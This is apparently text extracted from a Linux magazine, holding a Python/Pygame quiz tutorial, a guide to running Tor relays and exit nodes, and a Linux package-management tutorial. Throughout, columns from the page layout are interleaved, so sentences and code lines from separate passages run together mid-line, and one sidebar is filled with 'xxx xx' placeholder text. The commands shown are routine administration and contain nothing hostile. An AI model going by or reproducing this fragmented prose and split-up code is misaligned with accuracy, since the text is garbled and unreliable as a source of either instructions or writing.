to import a few extra libraries to further enhance our is generally renamed to GPIO or io. dialog and menu types.
The egdemo() function
project. For this project we will import three libraries,
does a great job of
and to do that we use the following code, which is Starting Pygame showing them all.
included at the top of our project. Pygame is a library full of great tools to create games
from easygui import * using Python. With Pygame you can create sprites,
import time characters or objects in the game world, and import
import pygame video, audio and images into your projects. Entire
As you can see, we've imported libraries into our games can be created using this library, for example
code in two different ways. The most common is the website showcases many
used twice and that is: games made in Python including a rather good
import <name of library> version of the original Super Mario Bros.
In order to use any of the functions contained inside For our quiz we're using the Pygame library to add
of a library imported in this manner we must call the music and sound effects when certain conditions are
library and the function by name. For example, if we met. These audio-based methods of output add a rich
want to use the sleep function from the time library, atmosphere to a game and provide audio stimulus to
we would do that like this the player – think of the jingle you get when you
time.sleep(1) collect coins in Mario or rings with Sonic.
This is the most traditional way of importing We imported the Pygame library earlier but now we
libraries and is a great practice to follow, but there is need to start it. To do that you need to initialise the
another way, and you can see that we have imported library like so:
the EasyGUI library in a different way: pygame.init()
from easygui import * We then need to initialise the mixer, which controls
This changes the previously used method of using audio in Pygame.
functions from a library. Using this method to import pygame.mixer.init()
the library means that we can omit the leading library This is all the setup that Pygame requires at this
name and just call the function. time. Later in our project we will set up a series of
msgbox(arguments for this function) functions that will handle the playback of audio.
This can be applied to many libraries, and is really
useful when working with those new to Python.
There's another method of importing a library, which
is to rename a library so that it is easier to use.
import time as t
As well as the shell, Idle
has a power editor that
t.sleep(1) is more than capable
As you can see, we have renamed the time library to of handling any size of
t, which makes it quicker to use. This practice is quite project. 79
Comparison operators
We start with defining the name of the function; in
One of the key parts of a quiz is making sure that the player
has the right answer, and the mechanism to do that is by
this example it's intro(). Next we create a variable
comparing the answer given to the expected answer. Below called intro, which will contain the output from loading
is a table of the most common comparison operators in the mp3 intro music into Pygame. Finally we instruct
Python, with an example of how to use each of them in your Pygame to play the music that has been queued into
next project. the mixer, but to only play the music once. Functions
Operator Description Example are very powerful and can be expanded into much
more versatile tools.
== Checks if the value q1 == “Float”
of two operands
are equal or not; Variables
if values are not Variables are an important part of many programming
equal then condition languages, and Python is no exception. Variables are a
becomes true. temporary method of data storage, and can store
!= Checks if the value if game_start != "No": many different types of data for reuse in a project. For
of two operands example, we can use a temperature sensor attached
are equal or not;
to a Raspberry Pi to read the temperature and store
if values are not
equal, then condition the value in a variable, or we can store a player's
becomes true. name. Variables are flexible enough to store anything.
In our project we use a few different variables to
> Checks if the value if score > 3:
of the left operand contain the player's score and location of external
is greater than the image files – here are a few examples.
value of the right score = 0
operand; if yes, the logo = "./images/masthead.gif"
condition becomes
start_title = "Welcome to Linux Voice Python Quiz"
Firstly, our score variable is used to track the
< Checks if the value if score < 1: progress of the player and is updated each time
of the left operand is
the player answers a question correctly. logo and
less than the value
of the right operand; start_title are two variables that store a string of text:
if yes, the condition in logo's case the location of the Linux Voice logo for
becomes true. the intro dialog box, and for start_title the text that is
>= Checks if the value if score >= 2: displayed at the top of the intro dialog box.
of the left operand
is greater than or Lists
equal to the value of Another method of storing data in our Python project
the right operand;
is to use a list. A list is also known as an array in other
if yes, the condition
becomes true. programming languages, and by using a list we can
store lots of individual items and use them in our
<= Checks if the value if score <= 3:
code. In our code we use a list to contain the possible
of the left operand is
less than or equal to answers to questions – for example, we use a list
the value of the right called play to contain the answers “Yes” and “No”
operand; if yes, the play = ["Yes","No"]
condition becomes All list contents are indexed, so individual items can
be recalled from the list. The first item in a list is
Pygame is an impressive and expansive library and in
this tutorial we haven’t even scratched the surface of
what it can do. If you would like to know more about
what Pygame can do (and we strongly reccomend it)
head over to their website
For our quiz we use three functions: intro(), win() and
lose(). These three functions were created to handle
playback of audio at key points in the game.
But what is a function? Well, a function is a way of
executing a block of program code just by calling its
name. Let's take a look at one of our functions Get the question right and the quiz plays a sound, adds 1
def intro(): to your score and moves on to the next question.
always index 0. For example, if we wished to print the
first item from the play list, which is “Yes”, then I would Expansion activity
do the following. Our quiz is playable, but the code is quite This will then print the answer to the
print(play[0]) large, with lots of repetition. How can we equation 2 * 3. For our project we can create
enhance our code so that we have a much a function for each of the different types of
smaller project? The answer may be to use a EasyGUI elements used, and then use the
EasyGUI guide
function with arguments. arguments to dictate what is displayed.
Easygui is a simple method of generating a graphical Earlier we used functions to control def msg(title,msg,image):
user interface (GUI). EasyGUI was created by Steve the playback of audio in the quiz. These msgbox(title=title,msg=msg,image=image)
Ferg, who left the project in March 2013. It is now functions took no arguments and simply With this function created we can now
under the maintenance of Alexander Zawadzki, who is ran when executed. A function that takes test to see if it works.
an argument expects to see one or more msg(“This is the title”,”This is a message to the
keeping the project alive, but the codebase is frozen
additional pieces of information before it player”,”./images/image.gif”)
with little chance of upgrade. Don’t let this put you off runs. Here is a basic example of defining a The above code will set the title to be
though – it's exceptionally easy to use. function that takes an argument. “This is the title” with a message reading
Using EasyGUI you can easily add a GUI to most def func(x,y): “This is a message to the player” and the
Python projects. If you would like to see the full library print(x*y) location of the image is used to grab the
To use this function, we call the function image and display it in the dialog box.
of GUI elements you can use the inbuilt demo
by its name and then substitute the x,y with So using this new function syntax, do
function, remembering to import the library to start the values that we wish to use, as so. you think that you could make a function for
with easygui.egdemo(). func(2,3) each of the dialogs made in our quiz?
For this project we're using three different types of
GUI elements.
Buttonbox To ask if the player would like to play. the variable is q1). Here is the code
Choicebox To ask questions and capture answers #Question 1
from the player. for i in range(0,3):
Msgbox To update the player on their score. msg = "What type of number is 1.4?"
EasyGUI has an easy-to-learn syntax which is title = "Question 1"
common across all of the many different types of GUI q1choices = ["Integer","Float","Very small"]
elements it provides. Here for example is the syntax to q1 = choicebox(msg,title,q1choices)
create a message box. Now that we have asked the question we need to
msgbox(title=”Title of dialog box”,msg=”Message to the use conditional logic to compare the answer given to
player”,image=”Location of the GIF”) the correct answer. To do this we compare the
Providing all of this information each time can be variable q1 with the hard-coded answer “Float”. If the
long winded, so to make things a little easier we have answer given matches the expected result then the
created variables that store the various details for win() function is called, which plays the audio. We
each question. then increment the score by one point. Finally we set
up the variables necessary for our GUI dialog box.
Question structure Once these steps are complete we break this loop and
Each question is inside a loop that will only repeat if move on to question 2.
the player answers the question incorrectly, and the if q1 == "Float":
player will only have three chances to answer each win()
question before they are automatically progressed to score = score + 1
the next question. Using a for loop with a range of 0 to correct = ("Well done you got it right. Your score is
3 we can have the question repeated three times "+str(score))
unless the loop is broken by a correct answer. image = "./images/tick.gif"
Under the for loop you can see the question being msgbox(title="CORRECT",image=image,msg=correct)
formed using variables such as msg and title, and break
there's also a list labelled q1choices, which contains But let's say that our player gets this question
the potential answers. All of these variables and the wrong – in this scenario we would move to the else
list are then used to create the contents of our first section of our logic. This triggers our lose() function to
question. To ask the question we first create a variable play audio and then creates two variables that will
to store the answer chosen by the player (in this case contain the contents of a dialog box informing the
player that they chose the wrong answer.
Project files
All of the files used in these projects are available via my
wrong = "I'm sorry that's the wrong answer"
GitHub repository. GitHub is a marvellous way of storing
and collaborating on code projects. You can find my GitHub image = "./images/cross.gif"
repo at msgbox(title="Wrong Answer",image=image,msg=wrong)
If you're not a Github user, don't worry you can still
obtain a zip file that contains all of the project files. The Zip Les Pounder is a maker and hacker specialising in the
file can be found at Raspberry Pi and Arduino. Les travels the UK training
Pibrella/archive/ teachers in the new computing curriculum and Raspberry Pi. 81
Discover how this anonymity network is helping activists around
the globe, and run your own node to contribute back.
magine you’re a blogger complaining about the
WHY DO THIS? actions of your repressive government. Or
• Keep yourself safe perhaps you’ve discovered a load of documents
online that incriminate some powerful people, and you want
• Help whistle-blowers to get them out to a friendly journalist. In both cases
and activists stay you’d be crazy to use the open internet – it’s about as
beyond the reach of
those who would silence secure as the writing on the back of a postcard, and
them you’d run the risk of a one-way trip to Guantánamo
• Bypass censorship Bay, or worse. What you’d need is a secure internet
anonymising service – like Tor.
Tor is a global network of computers run by
volunteers to provide online anonymity to anyone who
needs it. The network is based on the principal of The Atlas website can give you lots of graphs on how much
onion routing (the name Tor simply stands for ‘The data is flowing through individual nodes. Here’s a week’s
Onion Router’). This means that a connection goes traffic through the Linux Voice exit node.
through several encrypted layers, and the router at
each layer only knows what is essential to perform the Anyone monitoring your internet connection can
work at that layer. only see you exchanging encrypted information
When you connect to the Tor network the following with the guard relay.
process occurs: the client downloads a list of all The guard relay only knows your IP address and
available Tor relays and selects three: one guard, one who the middle relay is.
middle and one exit. The middle relay only knows the guard relay and the
If you then send information through the Tor exit relay, but not who you are or what website
network onto the internet, it’s first encrypted so that you’re requesting.
only the exit relay can see what the website you’re The exit node knows what you’re requesting off the
Arm – the Anonymising
requesting is. Then this already encrypted layer is internet, and who the middle relay is, but not who
Relay Monitor – provides
further encrypted so that only the middle relay knows you are or who the guard relay is.
a Curses-based interface
that works over SSH to that it should be sent to the exit relay. This doubly- This process completely separates the content
give you all the information encrypted layer is encrypted so that only the guard you’re requesting from anything that can be used to
you need to keep your Tor relay can see who the middle relay is. All this establish your identity.
node healthy. encryption is done before it leaves your computer, so: The Tor team has done excellent work to make sure
that it’s easy to use, because the people who need it
most (activists and people persecuted by their
governments) may not be tech-savvy. All you need to
do is download the Tor Browser Bundle from, unzip it, and run the start-tor-
browser script in the unzipped directory. This will
connect to Tor and open a web browser.
Another option is to run the Tails live CD. This can
be burned onto a DVD or USB stick and provides a
secure Tor environment for web browsing, instant
messaging, and other uses.
It’s also possible to stay anonymous on the go
using Orbot, an app for Android that will link your
phone or tablet to the Tor network.
Running the network
For the Tor network to function, it needs people to run
the relays that pass the data around the network and
onto the internet. These aren’t run by a centralised
organisation (since if one organisation controlled a Tor and the law
significant number of the relays, it would be able to
Although there have been several legal node, he was prosecuted for running a Tor
look at the information in several of these and spy on controversies surrounding Tor, to our exit node and using it to help people access
users), but by a number of individuals and projects knowledge no one has been convicted for horrific images.
around the world. running a Tor exit node. As we’re going to The Tor project is also being sued in
Linux Voice, for example, currently runs two, the first press, William Webber has just been America for allegedly assisting a website
convicted in Austria for abetting access to accused of purveying “revenge porn”.
one being a fairly modest exit node called Tor321. You
pornographic images of minors after However, this case seems to be built entirely
can see the current status of the node at someone downloaded such images through on a lawyer’s misunderstanding of what Tor We also run a bridge their exit node. actually is.
node (for details see the ‘A Network Under Attack’ However, the prosecution showed This case is being brought against the Tor
boxout on page 85). transcripts of conversations where Webber Project, so it shouldn’t have any impact on
was encouraging the use of Tor for such Tor node operators.
Running a Tor node is simply a case of installing the
things, and offering to assist. In other words, For more information on miss use of the
tor program and setting the appropriate options in the he wasn’t convicted for running a Tor exit Tor network, see the box out on abuse.
torrc file. However, before you start that, you should
understand the implications of the options you select.
The problem revolves around the fact that by should get legal advice before running a Tor node of
adding your computer to the Tor network, you’re any sort).
allowing other people to send data through your Some people who use the Hulu video streaming
machine. This data could be anything from someone service have reported problems with their IP address
shopping on eBay to Edward Snowden being blocked when they started running Tor nodes,
communicating with journalists in America to though this has been quickly dealt with by the Hulu
someone downloading illegal content (whatever that support team.
means in your country). Provided you have sufficient bandwidth to spare, it’s
perfectly possible to run a non-exit relay or bridge on a
Diplomatic immunity home internet connection. The easiest way to do this
This could attract the attention of your ISP and could is using the Vidalia graphical client. You can find this
cause you to get into trouble. However, this will only in most distro’s repositories (if you’re using Ubuntu,
be visible to your ISP if you’re an exit node. If you’re you should add the Tor project’s repository by
one of the first two hops on the Tor network, all the following the instructions at https://www.torproject.
data flowing into and out of your computer on the Tor org/docs/debian.html to make sure you get the most
network will be encrypted so that your ISP (or you for up-to-date version of Tor).
that matter) can’t see what it is. This means there For example, in Debian, you just need to run
should be no legal consequences for people running sudo apt-get install vidalia
non-exit Tor nodes in most countries (should you Then restart the computer to pick up the new user
happen to live in a country with restrictive laws settings, and run vidalia. This will open the graphical
governing internet usage such as China or Iran, you client and connect you to the Tor network. Click on Set
Up A Relay, then check the box marked Relay Traffic
Inside The Tor Network (Non-Exit Relay). In the
Strength through diversity
options, you can name your relay, add contact
Diversity is one of the key things that helps keep the Tor information, and limit the speed if you wish, but these
network anonymous. That means many things. It means are optional. Click on OK to start your relay running.
that a diverse spread of relays is important, because by In theory, you can run an exit relay from your home
spreading them out across many different networks in
internet connection, and a few brave souls do, but
many different countries, it becomes much harder to run
timing attacks. Similarly, diversity among exit nodes is also most people shy away from letting unregulated traffic
important because this means that anyone trying to listen into their home as it can cause problems.
in on all Tor traffic has to listen in more places. A diversity The majority of people who run exit nodes do so on
of bridge nodes is absolutely critical to keeping the Tor a server running in a data centre. However, not all data
network open to people inside restrictive countries.
centres are happy with people running Tor exit nodes
These are all quite obvious areas where diversity helps
the network, but less obviously, it’s also important to have a on their machines. If you’re interested in running an
diversity of users. If, for example, only whistle-blowers used exit node, the first step is usually to find a place that’s
the Tor network, then there would still be some anonymity, willing to host it. The Tor wiki provides a list of hosting
but any website operators would know that any connection providers that people have had good and bad service
coming from a Tor exit node was from a whistle-blower.
at (
Only by getting a wide range of users on the network can
it offer true anonymity to its users. Because of this, you GoodBadISPs), however, since diversity in all aspects
shouldn’t shy away from using the Tor network for fear is good for the Tor network, you may want to consider
of using up resources that other people may need more. emailing a few hosts and asking if they’ll consider
The sheer act of using it actually makes it more secure for using a Tor exit node.
everyone (although you shouldn’t run high-bandwidth traffic
You can rent a VPS (a Virtual Private Server – a
through the Tor network unless necessary).
virtualised environment on a shared server) to host 83
From a technical perspective, the only difference
between running an exit node and a relay is the exit
policy listed in the /etc/tor/torrc file, so we’ll start by
looking at this. By default, the exit policy will allow
most internet traffic through, but block file-sharing
ports and a few ports used by spammers. This will
both reduce the number of complaints you receive,
and help make sure that your bandwidth is helping
web traffic. Our Linux Voice exit node uses this policy.
You can create a custom policy to allow or disallow
any ports you like. A more liberal exit policy (stolen
from the Destiny exit node) is:
The Tails distro provides
your Tor node from just a couple of pounds per reject*
more than just web
browsing: the Pidgin client month, but in general, you get what you pay for, and reject*
is also set up with Tor, to dedicated servers usually come with much better reject *:25
provide anonymous instant internet connections, though this does vary from reject *:587
messaging. provider to provider. Ultra-low cost ones are likely to be reject *:465
low bandwidth (even if they are unlimited traffic), and accept *:*
may not be stable. It’s hard to give a definitive best This blocks access to any of the local network IP
option, but in general you don’t need much hard drive addresses (otherwise a malicious attacker could use
space, and only modest memory and CPU (unless your exit node to attack machines on the same local
you’re going to run a really fast relay). In most cases, area network), and ports 25, 587 and 465. These are
the bottleneck will be network speed. If you’re unsure the ports used by SMTP mail servers. Blocking these
about a particular option, the best bet is to try it out. won’t stop a mail client communicating with a server,
Most hosts provide hosting by the month or because that uses a different protocol; but it will stop
sometimes less, so if you find your particular setup a computer acting as a mail server and tunnelling
needs a bit more oomph, or is costing too much, you through your exit node – so basically, it’ll stop email
can usually switch to a new option. spammers from using your node. Exit policies are
public, so you can find out what other people are
Command line setup using by looking up nodes on https://atlas.torproject.
The biggest difference between setting up a Tor node org or
If you’ve used Tor
on a server compared with a desktop is that you don’t The final line is there to tell it to accept anything not
previously, you may
remember Vidalia as part of usually want to use the graphical setup tools. There’s rejected by the previous lines (non-exit nodes have a
the Tor browser bundle, but nothing to stop you doing this via VNC or an similar line that rejects everything).
it now needs to be installed equivalent, but there are command line tools that do Other than that, it’s useful to give your node a name
separately. the job better in this case. and add a contact email address. Neither of these are
essential, but they help with the smooth running of the
network, and make it easier for you to check what’s
going on. An email address will enable the Tor project
to contact you if there’s a problem.
If you don’t have the time or technical ability to run a
Tor node, but still want to contribute financially, you can
donate directly to the Tor project itself and help support
development via
en. Alternatively, you can donate to an organisation that
runs Tor nodes, such as
At Linux Voice, we’re currently running a couple of Tor
nodes, and would like to upgrade these to handle more
traffic. We’ve pledged to put 50% of our profits towards
good causes, and think that the Tor network is just such a
good cause. Later in the year, we’ll be asking subscribers
to vote on where this money should go, and increasing our
support of the Tor network will be one option.
A network under attack
Not everyone is happy with the Tor network providing Another approach that governments have taken network. For example, there’s the Flash proxy
people with anonymous and uncensored access to to censoring Tor is through Deep Packet Inspection (implemented in HTML5 rather than Flash). This
the internet. Some governments (such as those in (DPI). This means that instead of finding Tor is a way of starting a Tor bridge from inside a web
China and Iran) have attempted to block access to packets by IP address, they look for data within the browser, so it can be run on a far wider range of
Tor from within their countries. TCP/IP stream that signals that it’s Tor traffic. Tor computers. In turn this means that the supply of
The simplest way of blocking access is to get a attempts to disguise itself by looking as much like IP addresses is much larger, and changes far more
list of all Tor relays, and stop any packets heading Firefox communicating with an Apache TLS session rapidly than with traditional bridges, so it becomes
for these IP addresses. When governments realised as possible. This disguise isn’t perfect, and there is harder to block.
that they could block access to Tor in this way, a bit of a cat-and-mouse game going between the Other pluggable transport modules in the works
the Tor project introduced bridge relays. These are Tor project and the western companies that sell include ones that try to disguise the traffic as a
entry points to the Tor network that aren’t listed in DPI equipment to repressive governments. When a Skype call, and ways of making the traffic look like
the main Tor relay directory. They’re split up into differentiator is found, a government can block Tor, an HTTP stream with HTML, JavaScript, etc. As
groups: some of these are available on the internet, then a software update improves the disguise, and more of these become available, it’ll become harder
but only a few at a time; some of these are available service is restored. and harder to block them all.
via email; others are distributed via social networks Not all attacks focus on trying to block Tor. In an
and through trusted contacts. Hiding in plain sight attack widely thought to be performed by the FBI
Governments with large amounts of computer Of course, there’s no reason a government can’t (although not yet confirmed), malicious code was
power at their disposal have been able to discover simply block everything that looks like a secure injected into a hidden service that managed to break
a large number of these bridges. Because of this, Firefox communication with an Apache server – out of the Tor browser and get the computer to
it’s important for there to be a considerable ‘churn’. except for the social consequences. As we’ve seen reveal its actual IP address, and therefore location.
That means that if you’re thinking of setting up in Egypt and Turkey, such obvious censorship can The solution to this is simply better software, and
a non-exit Tor relay, a bridge is a great place to lead to demonstrations and more. much work has been done on browser security in
start. It’s also possible to run a bridge for just a few The next step from the Tor project to make it recent years. Currently the Tor browser is based
dollars a month by taking advantage of Amazon’s harder to block is pluggable transport modules. on Firefox – there is theoretically better security
free-usage tier in EC2 (see https://cloud.torproject. These have created a framework that enables a in Chrome, although there are some technical
org for details on setting one up). variety of different ways to connect to the Tor challenges to overcome before this can be used.
It takes a little while for your node to be picked up by Directly connecting users from Iraq
the network, but when it is, you’ll be able to find it by
searching for its name on 10000
This will also give details about how it’s running.
There’s more guidance on running an exit node at 8000
TorExitGuidelines. 6000
The best way to keep an eye on a node running
remotely is with the Arm command line tool. If you’re 4000
using Debian, you can get it with:
sudo apt-get install tor-arm 2000
It uses the Curses toolkit, so you can run it in an SSH
session. Arm has five screens: Graph, Connections, 0
Configuration, Torrc, and Interpretor. We’ve found it a
April 2014 May 2014 June 2014
bit easier to do the configuration outside of Arm, but
The Tor Project –
the Graph and Connections screens are useful for
The Tor project is
making sure everything is working properly. With a bit
Abuse constantly scanning for
of luck, you should soon see traffic flowing through censorship events. This
Rather predictably, the Tor network is abused by some people your node (it can take a few hours). After your node’s graph shows the number
who use it to conduct illicit activities. This is unfortunate, but been live for a little while (around a week or two), you of users connecting from
unavoidable without compromising the core values of open will be awarded a stable flag, which is an indication Iraq in June 2014 during
access and anonymity. However, this abuse makes up a tiny
that your node can be trusted to stay running, and not an Islamist insurgency.
fraction of Tor traffic (one common estimation reportedly
based on an unpublished study by the US Department of break down in the middle of a communication.
Justice puts it at 3% of Tor traffic). That’s all you need to start running your own Tor
The Tor network also plays a part in fighting cyber node. If you haven’t run a server before, it’s a gentle
crime. For example, the Internet Watch Foundation (a UK introduction to the world of server management.
organisation that blocks child sexual abuse content) needs
to use Tor, as all its IP addresses are blocked by many of
We’ve found it to be one of the easiest network
the sites they are trying to investigate. services to run, and the developers deserve a good
Ultimately, criminals have many methods of staying deal of praise for making it so straightforward.
anonymous, but legitimate whistle-blowers, activists and
journalists often have only one: Tor. That’s why so many
Ben Everard is the co-author of the best-selling Learn Python
people are prepared to support the network even though it is With Raspberry Pi, and is working on a best-selling follow-up
sometimes used for nefarious purposes. called Learning Computer Architecture With Raspberry Pi. 85
apt-get, dpkg, yum, zypper… There are many ways to install
packages on your Linux box. Here’s everything you need to know.
ackage management systems are both loved
WHY DO THIS? and hated in the Linux world. On the one hand,
• Understand how they provide efficient ways to install and
packages work and what
exactly they provide remove software, with everything neatly bundled up.
• Learn vital admin skills (Contrast this to Windows, where a setup.exe typically
to manage packages scatters all sorts of stuff all over your hard drive and
outside of the GUI registry, and running the “uninstaller” doesn’t get rid of
• Discover how packaging everything. You can even find third-party “uninstall”
systems work across
other distros tools designed to clean up this hideous mess.)
On the other hand, package management systems
often make it difficult to get the latest hot new
applications. You have to find the right repository for
your distribution, and make sure dependencies are
satisfied (usually this is automatic, but not always), Here’s the metadata for the Debian Vim package, obtained
and so forth. And if you’re completely new to Linux, with the dpkg -I command. Note the highlighted line,
you might find all of the terminology here baffling. So showing dependencies.
in this tutorial we’ll explore the two main packaging
systems used in GNU/Linux distributions, and provide list GTK as a dependency in its metadata. Package
some advanced tips and tricks for long-time Linuxers systems normally handle dependencies
as well. automatically, although it can get messy.
Repository An online store for packages. Most
Dissecting the jargon Linux distributions have their own repositories (or
First of all, let’s clear up any confusion by defining “repos”) with up to tens of thousands of packages.
some terms: Some software developers make their own
Package A single, compressed file that contains a third-party repositories that can be used alongside
program or related files such as a supporting code the official distro ones.
library, documentation, artwork or video game level These terms, and the general workings of
data. Some (usually small) programs are provided packaging systems, apply across almost every Linux
in single packages, whereas larger application distribution. There are some technical differences in
suites like KDE and LibreOffice are supplied in the implementation of packaging systems, and
multiple packages (to make updates easier, as you command names vary, but the underlying principles
don’t have to download the whole lot each time). are the same.
Dependency Every package includes some Most desktop-focused distros include graphical
metadata, such as other packages it depends on. package managers; in this tutorial, however, we’ll
For instance, the AbiWord word processor uses the focus on the command line tools, as they’re usually
GTK toolkit for its interface – a library that is much more versatile and teach you a lot more about
supplied separately – so the AbiWord package will what’s going on.
Let’s start with the system used by Debian, Ubuntu (This needs to be run as root, the administrator user,
and other distros based on these two. Apt (which hence the sudo command at the start. On Ubuntu-
stands for the “Advanced Packaging Tool”) provides a based distros you’ll be asked for your user account
suite of utilities for locating, downloading and password. If you’re on Debian, the command is su -c
managing dependencies of packages. “apt-get install abiword” – modify the rest of the
The apt-get tool installs a program. For instance, sudo commands in this tutorial to use su -c with
say we want AbiWord; open a terminal and enter: quotes instead. You’ll be asked for the root password
sudo apt-get install abiword in this case.)
Before downloading AbiWord, Apt will tell you which
dependencies it’s going to retrieve, show you how
much drive space is going to be used, and check for
confirmation. Hit Enter to go ahead, or N to stop. Apt
will pull the packages from the internet repositories
and install them.
Now, that apt-get command is great when you
know exactly what you’re looking for – but what if you
don’t know the name of a package? Try this:
apt-cache search “word processor”
Aha! This lists all packages in the distro’s database
that have “word processor” in their descriptions. (If it’s
a long list, pipe it into the less text viewer, like so:
apt-cache search “word processor” | less. Hit Q to
quit the viewer.) Note that we don’t need sudo in this
case, because merely searching the database isn’t an
administrative command that changes system files.
The next question you’re probably asking is: how
does Apt retrieve and store all of this information?
At http://backports.debian.
Every time you do this command: temporarily for some reason. If the apt-get remove
org you’ll find repositories
sudo apt-get update command also deleted your hand-crafted config file, that provide up-to-date
Apt retrieves the latest package information from you’d be gutted.) So to remove all configuration files: applications for older
the repositories, and stores the details in /var/lib/ sudo apt-get remove --purge abiword Debian stable releases.
dpkg. (Also note that Apt caches packages in /var/ This has totally removed the program from the
cache/apt after downloading, which can take up a lot system, but its dependencies still remain. If you want
of space, so use sudo apt-get clean to remove them.) to remove those as well (providing that they’re not
Note that this command merely updates the being used by any other program) then follow up the
database, and doesn’t actually update your system to previous command with:
the latest version of the packages. For that you need sudo apt-get autoremove
to enter:
sudo apt-get upgrade dpkg
There’s also a more low-level dpkg utility, which PRO TIP
Begone, unwanted apps handles the nitty-gritty of installing and removing To extract
Xxxxx xxx xxx
a Deb
xx file
There are various ways to remove a program, which packages. Here are some of its more useful xx xxxrun
hand, ar x <filename.
xx xxxx xxx xxx xxx
xx xxxxThisxxxcreates
xx xxx xxthree
may seem a bit odd at first, but when you compare it commands: xxx xx
files in xxx
the xx
xxxx xxx xx
with the aforementioned mess on Windows it makes dpkg -l lists all installed packages. You can show xxx xx xxxxdata.tar.gz
directory: xxx xx xxx xx
a lot of sense. First the simplest way: the details (version number and short description) xxxx xxx xx xxx
(containing the program’s
xx xxxxxx
xxx xxtypically
files, xxx xx xxxx
xxx xx
sudo apt-get remove abiword for a single package with dpkg -l abiword. xxx xx
into /usr);
xxx xx xxx xx
This gets rid of the program, but not any system- dpkg -i <package.deb> this installs some package xxxx xxx xx xxx
(containing the package’s
xx xxxx
wide configuration files. (This isn’t a big deal with a (for example, package.deb) that you have metadata, such as
dependencies); and
desktop program, but imagine if you’ve spent hours downloaded. It’s a useful command if you’ve got a debian-binary (the
configuring a mail server, and need to remove it program off a website, although repositories are the version of the .deb file
better method. format being used,
usually 2.0). Sometimes
dpkg -L abiword lists all files inside the package.
Advanced tip: Converting RPMs to Debs the control and data files
dpkg -S /path/to/file this shows which package have different
It should be an absolute last resort, but if you really need it contains /path/to/file. So dpkg -S /bin/ls shows compression formats, and
you can use a tool called Alien to convert RPM packages to end in .bz2 or .xz.
that it’s part of the coreutils package.
Deb files and vice-versa. However, due to the technical and
implementation differences between these package
formats, along with the usual plethora of different file Adding repositories
locations and library versions across distros, the results are Debian-based distributions store their repository
rarely pretty. To use it (as root): information in /etc/apt/sources.list. This is a plain
apt-get install alien text file containing URLs from which packages can be
alien --to-deb <filename.rpm>
retrieved, along with the codename of the distribution
(Use --to-rpm if converting the other way round.) If you
want pre- and post-installation scripts to also be (eg “wheezy” for Debian 7) and the types of packages
transferred into the new package, add the --scripts option. (eg “main” for free/open source software from the
For small, single-package programs with limited (or main Debian developers, “non-free” for packages that
statically compiled) dependencies, Alien can sometimes be a have licence issues etc.) You can add repositories to
life-safer when you have no other options. But it’s a bit of a
that list as you discover them on the web – just
hack job, and shoehorning one distro’s package into
another distro usually results in a broken app. Beware! remember to do apt-get update afterwards so that
your local database is in sync. 87
If you plan to add multiple repositories from
different sources, it’s better to place them in separate
files in the /etc/apt/sources.list.d directory. This
makes them easier to manage and remove, and
means your distro can manage the main sources.list
file without getting confused by your modifications.
If you’re using Ubuntu or Mint, you’ll often come
across PPAs (Personal Package Archives). These are
repositories set up by developers and third-party users
to provide packages that aren’t officially in the
distribution – or newer versions of packages. Most Many PPAs are available for Ubuntu and Mint, providing
flavours of Ubuntu and Mint only receive package packages that aren’t officially part of the distros.
updates for security holes or bugfixes, and you have
to upgrade to a new version of the distribution every Studio for recent versions of Ubuntu. On his page at
six months if you want the latest software – not
always an ideal situation. With a PPA, you can get new android-studio you’ll see that his PPD is called
versions of software for your existing distribution, ppa:paolorotolo/android-studio. To install the
without having to wait or upgrade, so they’re very program you’d enter the following:
popular among users who want to live life on the sudo apt-add repository ppa:paolorotolo/android-studio
bleeding edge. sudo apt-get update
A PPA typically includes the name of the developer sudo apt-get install android-studio
along with the name of the program, so here’s an You’ll find many PPAs on the web, and they’re a
example: Paulo Rotolo has packaged up Android great way to try new apps quickly.
Let’s move on to the RPM-based distros. RPM was latest packages in the repositories (yum update). To
originally the “Red Hat Package Manager”, due to its get rid of unused dependencies that were installed by
origins in that distro, but today it’s known as the “RPM programs you’ve since removed, use yum
Package Manager” (yes, a recursive acronym) due to autoremove. And to remove cached packages after a
its use in many other distros. Unfortunately, things get big download, enter yum clean packages.
a bit fragmented here, with each RPM-based distro You can get detailed information about a package,
using its own toolset. Most of the commands are such as whether it’s installed or not, like so:
similar though. yum info abiword
Fedora and Red Hat Enterprise Linux use the Yum And to see which dependencies a package has, try
package manager for searching and downloading yum deplist <package>. To generate a complete list
packages, while the rpm command does the work of of all installed packages, enter yum list installed.
installing. To find a program, do: Yum stores its repositories in plain text files in the
yum search abiword /etc/yum.repos.d directory; to add a new repository,
And to install (switch to root with su first): use this command:
yum install abiword yum-config-manager --add-repo <URL>
Removing packages is easy (yum remove (Simply delete the file in /etc/yum.repos.d to remove
<package>), as is updating the distribution to the the repository.)
Advanced tip: CheckInstall RPM
Yum is the tool you’ll want to use most of the time, but
In LV005 we looked at compiling programs accordingly. So instead of entering sudo for more low-level work involving individual packages
from their source code (p86). You may recall make install, you’d enter sudo checkinstall. that you’ve downloaded, there’s the rpm command.
that the make install step places the If we do that using Alpine (the example For instance, rpm -qpi <package.rpm> displays
program’s files in your filesystem – usually in app that we compiled last issue), we end up
information about a locally stored package (qpi
subdirectories of /usr or /usr/local. Wouldn’t with a package called alpine_2.11-1_i386.
it be better, though, if you could bundle up deb, and CheckInstall has also installed it. stands for ‘query package information’), and rpm -i
the newly installed files into a package, for Now we can easily copy that package to <package.rpm> installs it.
easy distribution and removal? another machine (as long as it’s running the You can also use rpm to find out which package a
Well, you could learn the highly complicated exact same distro!) and remove it using the file belongs to:
art of making packages by hand, or use commands mentioned earlier in this guide.
rpm -qf /path/to/file
CheckInstall instead (it’s provided in most Note: packages generated by CheckInstall
distros’ repositories). This monitors all files are very specific to your own distro setup, And to list the contents of a package, use rpm -ql
created in a make install operation and and lack proper meta data information, so <package>.
generates and installs a package they may not work elsewhere. Unusually, RPM uses the cpio archive format for its
packages – a format that few people have heard of.
Consequently, it can be difficult to remember the
options used to extract files. If you need to extract a
.rpm file, first move it into a separate directory (to stop
it potentially overwriting files in the current one), and
then enter this command:
rpm2cpio <package.rpm> | cpio -idmv
Of course, you should replace <package.rpm> here
with the real package filename. This creates a
directory structure in the current directory that would
normally be extracted into the root (/) directory when
installing the package.
It’s worth noting that Yum will be around for a few
more Fedora releases, but ultimately the goal of the
distro developers is to move to a new package
manager, DNF, which forked from Yum in 2012. DNF
should be largely compatible with Yum, so most of the
commands will be identical or similar, and in Fedora
22 entering yum will actually run dnf and display a
See for a handy Zypper
warning message.
cheat sheet ( for the second page).
OpenSUSE and Mageia
Let’s look at the most common commands for these distros more easily, and you know more about what’s
